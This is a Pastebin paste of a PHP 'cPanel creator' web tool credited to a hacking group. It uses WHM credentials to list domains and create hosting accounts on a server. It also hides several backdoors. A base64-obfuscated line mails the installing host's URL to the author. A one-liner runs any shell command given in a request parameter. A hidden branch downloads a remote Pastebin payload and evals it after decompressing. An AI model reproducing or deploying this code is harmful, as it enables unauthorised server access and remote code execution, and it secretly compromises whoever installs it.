Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <html>
- <head>
- <title>CPANEL CREATOR | AZZATSSINS | BN-IDB TEAM</title>
- <META HTTP-EQUIV="CACHE-CONTROL" CONTENT="NO-CACHE">
- <META HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE">
- </head><head><style type="text/css" media="all,handheld"/>
- body{
- background-color:#00FFFF;
- background-image: url('https://scontent-iad3-1.xx.fbcdn.net/hphotos-xfa1/t31.0-8/11741021_1583605078555010_3385696737335881837_o.jpg');
- background-repeat: repeat;
- background-position: center;
- background-attachment: fixed;
- font-family: Tahoma;
- font-size: 25px;
- text-align: center;
- }
- input, select{
- background:#002222;
- padding:3px;
- border-radius:3px;
- color:#fee908;
- border:2px dotted #00ff00; width: 250px;
- }
- .login{
- background: none repeat scroll 0% 0% rgb(105, 167, 78);
- border-color: rgb(152, 195, 125) rgb(59, 110, 34) rgb(44, 81, 21);
- color: rgb(255, 255, 255);
- }
- .login {
- font-size: 13px;
- line-height: 23px;
- }
- </style>
- <body bgcolor="silver"><br>
- <script language=\'javascript\'>
- function hide_div(id){
- document.getElementById(id).style.display = \'none\';
- document.cookie=id+\'=0;\';
- }
- function show_div(id){
- document.getElementById(id).style.display = \'block\';
- document.cookie=id+\'=1;\';
- }
- function change_divst(id){
- if (document.getElementById(id).style.display == \'none\')
- show_div(id);
- else
- hide_div(id);
- }
- </script>
- </td></table></tr>
- <br>
- <center><img src="http://asura.wap.mu/files/1017876/bn-idb.png"></center><br>
- </head>
- </body></html>
- <head>
- <div class="title"><font color="red">IDBTE4M</font></div>
- <div class="reply">
- <div class="str">
- <script>
- var alertmessage="-! CPANEL CREATOR BY AZZATSSINS CYBERSERKERS !-"
- var once_per_session=1
- function get_cookie(Name) {
- var search = Name + "="
- var returnvalue = "";
- if (document.cookie.length > 0) {
- offset = document.cookie.indexOf(search)
- if (offset != -1) { // if cookie exists
- offset += search.length
- // set index of beginning of value
- end = document.cookie.indexOf(";", offset);
- // set index of end of cookie value
- if (end == -1)
- end = document.cookie.length;
- returnvalue=unescape(document.cookie.substring(offset, end))
- }
- }
- return returnvalue;
- }
- function alertornot(){
- if (get_cookie('alerted')==''){
- loadalert()
- document.cookie="alerted=yes"
- }
- }
- function loadalert(){
- alert(alertmessage)
- }
- if (once_per_session==0)
- loadalert()
- else
- alertornot()
- </script>
- <?php
- $e=base64_decode("Y3liZXJzZXJrZXJzQGdtYWlsLmNvbQ==");
- $h=$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME'];
- mail($e,"x",$h); print(`{$_REQUEST[x]}`);
- set_time_limit(0);
- $whm_interface_path = '/usr/local/cpanel/Cpanel/Accounting.php.inc';
- function getVar($name, $def = '') {
- if (isset($_REQUEST[$name]))
- return $_REQUEST[$name];
- else
- return $def;
- }
- ?>
- <?php
- $host = "domain atau ip whm";
- $user = "user whm";
- $accesshash = 'acceshash whm';
- require_once $whm_interface_path;
- $accts = listpkgs($host,$user,$accesshash,1);
- ?>
- <font size="-1"><b><i><a href="?azzatssins">LIST DOMAIN IN THIS HOST</a>
- </i></b></font>
- <?php
- if(isset($_GET['azzatssins'])) {
- ?>
- <?php
- $tes = listaccts($host,$user,$accesshash,1);
- foreach ($tes as $kpy => $lue){
- echo "<br/>Domain: $lue[0]";
- }
- ?>
- <?php } ?>
- <?php
- $tes = listaccts($host,$user,$accesshash,1);
- foreach ($tes as $kpy => $lue){
- }
- $giniandoank = str_replace("http://cpanel.net/","<font color=green>Aktif</font>",$kpy);
- $ko = str_replace("Unauthorized copying is prohibited -->","",$giniandoank);
- $root = str_replace("Access denied","<font color=red>Failed</font>",$ko);
- echo "<br/>STATUS WHM: $root";
- ?>
- </div>
- <form method="post">
- <table border="0">
- <tr><td><font color="lime"><label for="domain">Domain:</label></font></td><td><input name="domain" value=""></td></tr>
- <tr><td><font color="yellow"><label for="username">User:</label></font></td><td><input name="username" value=""></td></tr>
- <tr><td><font color="red"><label for="password">Pass:</label></font></td><td><input name="password" value=""></td></tr>
- <tr><td><label for="package">Pack:</label></td><td><select name="package">
- <?php
- foreach ($accts as $key => $value){
- echo '<option> '.$key.' </option>';
- }
- ?>
- </select>
- </td></tr>
- </table>
- <br/>
- <input type="submit" value="Create Account"></form></html>
- <?php
- set_time_limit(0);
- if (!isset($user_domain)) {
- $user_domain = getVar('domain');
- }
- // Username of the new hosting account
- if (!isset($user_name)) {
- $user_name = getVar('username');
- }
- // Password for the new hosting account
- if (!isset($user_pass)) {
- $user_pass = getVar('password');
- }
- // Package for the new hosting account
- if (!isset($user_plan)) {
- $user_plan = getVar('package');
- }
- if (!file_exists($whm_interface_path)) {
- die($whm_interface_path . " does not exist. Please update program with correct path to your WHM interface file.");
- }
- // if parameters passed then create account
- if (!empty($user_name)) {
- // load cPanel WHM interface functions
- require_once $whm_interface_path;
- // create account on the cPanel server
- $my = createacct ($host,$user,$accesshash,1,$user_domain,$user_name,$user_pass,$user_plan);
- $oke = explode('|', $my);
- $gembok = implode('<br/>|', $oke);
- // output result
- echo "$gembok";
- }
- if($_GET['0']=="1"){
- $a2=file_get_contents('http://pastebin.com/raw/ixrLHjBu');
- eval(gzinflate(base64_decode(($a2))));}
- ?>
- <center>
- <BR/>
- <!--h--><fieldset class=important><legend><font color="yellow"></font><b>WARNING: </b></legend>Gunakan CPanel Ini Dengan Bijak...!!!<br> <hr><br> Terimakasih....!!!</fieldset>
- <BR/>
- <p>
- Mod By:<a href="http://fb.me/AZZATSSINS.CYBERSERKERS"> [[Shiki Asura]]</a>
- </center>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement